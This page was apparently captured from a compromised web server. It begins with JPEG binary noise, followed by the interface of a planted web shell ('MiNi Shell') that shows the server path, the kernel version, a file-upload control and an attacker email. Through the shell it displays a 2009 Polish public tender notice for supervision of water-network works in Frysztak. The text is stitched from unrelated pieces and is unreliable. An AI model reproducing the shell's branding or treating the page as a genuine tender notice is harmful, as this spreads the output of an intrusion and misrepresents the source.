JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090716/113423-N-2009.html

<p class="kh_header"><b>Frysztak: Pełnienie nadzoru inwestorskiego nad robotami budowlanymi w ramach projektu -Poprawa podstawowych usług dla gospodarki i ludności wiejskiej poprzez budowę i przebudowę sieci wodociągowej z rozbudową i nadbudową Stacji Uzdatniania Wody we Frysztaku wraz z modernizacją technologii uzdatniania wody</b><br>
<b>Numer ogłoszenia: 113423 - 2009; data zamieszczenia: 16.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Frysztak , ul. Księdza Wojciecha Blajera 20, 38-130 Frysztak, tel. 017 27777110 w. 302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frysztak.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad robotami budowlanymi w ramach projektu -Poprawa podstawowych usług dla gospodarki i ludności wiejskiej poprzez budowę i przebudowę sieci wodociągowej z rozbudową i nadbudową Stacji Uzdatniania Wody we Frysztaku wraz z modernizacją technologii uzdatniania wody.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad robotami budowlanymi w ramach projektu -Poprawa podstawowych usług dla gospodarki i ludności wiejskiej poprzez budowę i przebudowę sieci wodociągowej z rozbudową i nadbudową Stacji Uzdatniania Wody we Frysztaku wraz z modernizacją technologii uzdatniania wody, o dofinansowanie którego w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013,  - działanie 321 -Podstawowe usługi dla gospodarki i ludności wiejskiej, ubiega się zamawiający.
W zakres projektu wchodzą następujące zadania inwestycyjne:
3.1.1. Budowa sieci wodociągowej w miejscowości Frysztak oraz sieci wodociagowej z  przyłączami do budynków i zasilaniem energetycznymw miejscowości Kobyle . 
W ramach zadania wykonane zostaną:
a) Roboty ziemne - sieć wodociągowa						mb 12564
b) Roboty montażowe - sieć wodociągowa						mb 12564
c) Roboty ziemne - przyłącza wodociągowe						mb 2832
d) Roboty montażowe - przyłącza wodociągowe					mb 2832
e) Roboty ziemne - przekroczenia dróg (komory przewiertowe)			kpl	1
f) Roboty montażowe - przekroczenia dróg metodą podwiertu			kpl	1
g) Roboty drogowe - przekroczenia dróg metodą rozkopu				kpl	1
h) Roboty ziemne - przekroczenia dróg metodą rozkopu				kpl	1
i) Roboty montażowe - przekroczenia dróg metodą rozkopu - rury ochronne	kpl	1
j)Roboty montażowe instalatorskie w pompowni SUW				kpl	1
k)Roboty elektryczne w pompowni SUW						kpl	1
l)Roboty ziemne - pompownia P2							kpl	1
ł)Roboty budowlane - pompownia P2						kpl	1
m)Roboty ziemne - zasilanie pompowni P2						kpl	1
n)Roboty elektryczne - zasilanie pompowni P2					kpl	1
o)Roboty elektryczne w budynku SUW						kpl	1
p)Roboty montażowe w budynku SUW						kpl	1

3.1.2.Budowa sieci wodociągowej w m.Frysztak , Pułanki i Glinik Dolny oraz przebudowa  sieci wodociagowej z przyłączami w m. Frysztak , Pułanki i Glinik Dolny
W ramach zadania wykonane zostaną:
a) Przyłącza wodociągowe - jako koszty niekwalifikowane				mb	217
b) Przyłącza wodociągowe - jako koszty kwalifikowane				mb	428
c) Sieć wodociągowa - m. Pułanki							mb      1109
d)Przebudowa sieci wodociągowej - ul. Wybickiego				mb	630
e)Przebudowa sieci w ul. Blajera, Frysztackiego i Br. Dymnickich			mb      1273
f) przekroczenia dróg 									kpl 	1
g) roboty ziemne 									kpl.      1 
h) roboty montażowe 									kpl.  	1

3.1.3. Rozbudowa  ( dobudowa i nadbudowa)istniejacego  budynku Stacji Uzdatniania Wody we Frysztaku z modernizacja technologii uzdatniania wody oraz wymianą instalaci elektrycznej.
W ramach zadania wykonane zostaną
a)Dobudowa klatki schodowej							kpl	1
b)Poddasze										kpl	1
c)Elewacja										m 2	62,5
d)Płytka odbojowa i plac postojowy z kostki brukowej				m 2	300
e)Instalacja wod. - kan.								kpl	1
f)Instalacja c.o.									kpl	1
g)Instalacja solarna									kpl	1
h)Instalacja elektryczna - nadbudowa						kpl	1
i)Instalacja odgromowa								kpl	1
j)Wykonanie dachu - roboty ogólnobudowlane					kpl	1
k)Instalacje elektryczne wewnętrzne - technologia					kpl	1
l)Wizualizacja pracy SUW								kpl	1
ł)Pomiary										kpl	1
m)Roboty zewnętrzne - kablowe - zbiorniki						kpl	1
n)Instalacje technologiczne								kpl	1
m)Budowlanka - część technologiczna i ocieplenie 					kpl	1

Zakres rzeczowy pełnienia nadzoru inwestorskiego obejmuje roboty wymagające uprawnień budowlanych  w specjalnościach :
konstrukcyjno - budowlanej, 
instalacyjnej w zakresie sieci, instalacji i urządzeń ,wodociągowych i sanitarnych 
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1).Zamawiający żąda wniesienia wadium:
2).Wadium wnosi się przed upływem terminu składania ofert w jednej lub kilku formach  określonych w art. 45 ust.6 ustawy . W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego zamawiającego.
3). Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
4)Wykonawca zobowiązany jest do wniesienia wadium w wysokości 1 000,00zł (słownie: jeden tysiąc złotych) do dnia 27.07.2009 r. do godz. 10:30 w wybranej przez siebie formie dopuszczonej ustawą Prawo zamówień publicznych 
5)Wadium należy wnieść na adres Urzędu Gminy Frysztak, 38-130 Frysztak, ul. Ks. W. Blajera 20 .
6)W przypadku wpłaty wadium w formie pieniężnej , należy wpłacić go na rachunek Urzędu Gminy Frysztak  w Banku Spółdzielczym Strzyżów O/Frysztak nr rach: 
 95 9168 1027 5505 8519 2000 0005 - wyłącznie w formie przelewu.
7) Wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 46 ustawy  prawo zamówień publicznych z dnia 29 stycznia 2004 roku.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Zgodnie z art. 22 ust. 1 Ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych, wykonawca powinien:
a)posiadać uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do  wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d)nie podlegać wykluczeniu z postępowania o udzielenie zamówienia 
2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców którzy:
a) nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art.22 Prawa zamówień publicznych 
b) podlegają wykluczeniu z postępowania na podstawie art.24 ust.1 i 2 Prawa zamówień publicznych 
c) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności  chyba, że udział tych Wykonawców w postępowaniu nie utrudni uczciwej konkurencji
d) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.
f) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art.26 ust. 3 Prawa zamówień publicznych.
g) nie wnieśli wadium , w tym również na przedłużony okres związania z ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą.
3. Zamawiający odrzuca ofertę jeżeli:   
a) jest niezgodna z ustawą
b) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia z zastrzeżeniem art.87 ust.2 pkt 3 ustawy
c)jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji
d) zawiera rażąco niska cenę w stosunku do przedmiotu zamówienia
e) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub nie zaproszonego do składania ofert
f) zawiera  błędy w obliczeniu ceny.
g) wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki , o której mowa w art.87 ust.2 pkt.3 ustawy
h) jest nieważna na podstawie odrębnych przepisów
i) Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.

4. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu

Ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez wykonawców wszystkich kryteriów określonych w niniejszej SIWZ na zasadzie spełnia-nie spełnia, tzn. każdy z wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki w pkt. 6 pod rygorem odrzucenia oferty lub wykluczenia wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.Wykaz oświadczeń i dokumentów, jakie muszą złożyć wykonawcy wraz z pisemną  ofertą, w celu potwierdzenia spełniania warunków udziału w postępowaniu:  

6.1. OŚWIADCZENIA
1). Oświadczenie o spełnieniu warunków udziału w postępowaniu, z art. 22 ust.1 i art. 24 ustawy Prawo zamówień publicznych o treści zgodnej z określoną w załączniku nr 2 do SIWZ, tzn.:
a)oświadczenie, że wykonawca posiada uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
b)oświadczenie, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub oświadczenie, że Wykonawca będzie dysponował potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (w tym przypadku należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia) albo oba te dokumenty łącznie,
c)oświadczenie, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej   zapewniającej wykonanie zamówienia,
d)oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia z powodów wymienionych w ustawie Prawo zamówień publicznych , tj.
     -  że nie wyrządził szkody nie wykonując zamówienia lub wykonując je nienależycie (art. 24 ust. 1 pkt 1 ustawy). Pod pojęciem wyrządzonej szkody należy rozumieć szkodę, która została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie trzech lat przed wszczęciem postępowania;
     - że, w stosunku do Wykonawcy nie otwarto likwidacji ani nie ogłoszono upadłości chyba, że po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
     -  że nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne            lub zdrowotne (art.24 ust.1 pkt 3 ustawy) lub że uzyskał zgodę na zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji organu podatkowego;
    -  w przypadku osoby fizycznej, że nie została prawomocnie skazana za przestępstwo          popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w  zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego;
    -  w przypadku spółki jawnej, że wspólnik nie został prawomocnie skazany za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego;
    -  w przypadku spółki partnerskiej, że partner lub członek zarządu nie został prawomocnie skazany za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko  prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu  osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego;
   -  w przypadku spółki komandytowej oraz spółki komandytowo-akcyjnej, że komplementariusz nie został prawomocnie skazany za przestępstwo  popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu   osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w  zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa  skarbowego;
   -  w przypadku osób prawnych, że urzędujący członek organu zarządzającego nie został prawomocnie skazany za przestępstwo popełnione w związku z postępowaniem  o udzielenie zamówienia, przestępstwo przeciwko  prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w  zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa  lub przestępstwa  skarbowego;
w przypadku podmiotów zbiorowych, że sąd nie orzekł zakazu ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione  pod groźbą kary;
że wykonawca nie wykonywał bezpośrednio czynności związanych z przygotowaniem prowadzonego postępowania lub nie posługiwał się w celu sporządzenia oferty osobami uczestniczącymi w  dokonywaniu tych czynności chyba że udział takiego wykonawcy w postępowaniu nie utrudni  uczciwej  konkurencji,
2). 	Oświadczenie, iż Wykonawca wyraża zgodę na sukcesywną wypłatę wynagrodzenia 	przez Zamawiającego na  podstawie wystawianych przez Wykonawcę faktur za   	pełnienie 	nadzoru inwestorskiego w terminie 30 dni od daty ich otrzymania przez 	Zamawiającego z 	tym że wynagrodzenie Wykonawcy za wykonanie przedmiotu 	umowy, rozliczane będzie 	w następujących okresach rozliczeniowych: 
a) dla zadania : Budowa sieci  sieci wodociągowej w miejscowościach Frysztak, Kobyle,Glinik Dolny  i Pułanki i modernizację sieci wodociągowej we Frysztaku i Gliniku Dolnym   po zakończeniu i bezusterkowym odbiorze zadania w terminie do 15 stycznia 2010 roku,
b) dla zadania: Rozbudowa (dobudowa i nadbudowa) Stacji Uzdatniania Wody we Frysztaku z wymianą technologii uzdatniania wody oraz instalacji elektrycznej, ocieplenie budynku, wykonanie utwardzenia placu kostką brukową  po zakończeniu i bezusterkowym odbiorze zadania w terminie do 31 grudnia 2010 roku,
3).	Oświadczenie, że Wykonawca akceptuje załączony do SIWZ wzór umowy i zobowiązuje 	się do  zawarcia umowy na wymienionych w niej warunkach,
6.2. DOKUMENTY
1)W celu spełnienia warunku o którym mowa w pkt.5.1. pdpk. a) SIWZ - Wykonawca przedkłada :
a)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed 
upływem terminu składania ofert.

2)W celu spełnienia warunku o którym mowa w pkt.5.1. pdpk. b) SIWZ - Wykonawca przedkłada
a) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Przedłożony przez oferenta wykaz i dokumenty (kopia stosownych dokumentów potwierdzona za zgodność z  oryginałem) muszą potwierdzać, że: 
inspektor nadzoru  robót budowlanych posiada uprawnienia w specjalności konstrukcyjno - budowlanej, jest aktualnie wpisany na listę członków właściwej izby samorządu zawodowego oraz posiada ubezpieczenie O.C.,
inspektor nadzoru  robót sanitarnych posiada uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i sanitarnych jest aktualnie wpisany na listę członków właściwej izby samorządu zawodowego oraz posiada ubezpieczenie O.C.,
inspektor nadzoru  robót elektrycznych posiada uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, jest aktualnie wpisany na listę członków właściwej izby samorządu zawodowego oraz posiada ubezpieczenie O.C.,
3)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terenem Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa, składa dokumenty lub oświadczenia szczegółowo określone w §2  Rozporządzenia  Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz.U. z 2006 r. Nr 87, poz. 605).
4)Dodatkowo wykonawca dołącza do oferty  wykaz osób i podmiotów   ( podwykonawców) , które będą wykonywać zamówienie lub będą uczestniczyć w      wykonywaniu zamówienia, wraz z danymi na temat zakresu wykonywanych przez nich czynności, zgodnie z załącznikiem nr 4 do SIWZ - o ile bedzię wykonywał zamówienie  z podwykonawcami.
5) Wykaz osób do kontaktu - zał. Nr 5. 
     6)  W przypadku spółki cywilnej lub konsorcjum należy złożyć dodatkowo:
a)wykaz wspólników lub konsorcjantów ubiegających się o udzielenie przedmiotu zamówienia
b)pełnomocnictwo udzielone jednemu ze wspólników lub konsorcjantów lub innej osobie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
c)Oferta winna zawierać dokumenty określone w pkt. 6.2. podp. 1, podp.2 lit.a  dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.
Uwaga 1 :
1.Kopie dokumentów winny być potwierdzone co do zgodności z oryginałem przez  Wykonawcę.
2.Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów jest karalne. Zgodnie z art. 24 ust. 2 pkt. 2 ustawy wykonawca, który złożył nieprawdziwe informacje mające wpływ na wynik postępowania zostaje wykluczony z postępowania. Gdy fakt podania nieprawdziwych informacji wyjdzie na jaw po zawarciu umowy - umowa taka jest  nieważna z mocy prawa..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.frysztak.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy we Frysztaku ,  ul. Ks.W. Blajera 20, 38-130 Frysztak  pok. nr 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2009 godzina 10:30, miejsce: Urząd Gminy we Frysztaku ,  ul. Ks.W. Blajera 20, 38-130 Frysztak  pok. nr 8  (sekretariat)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com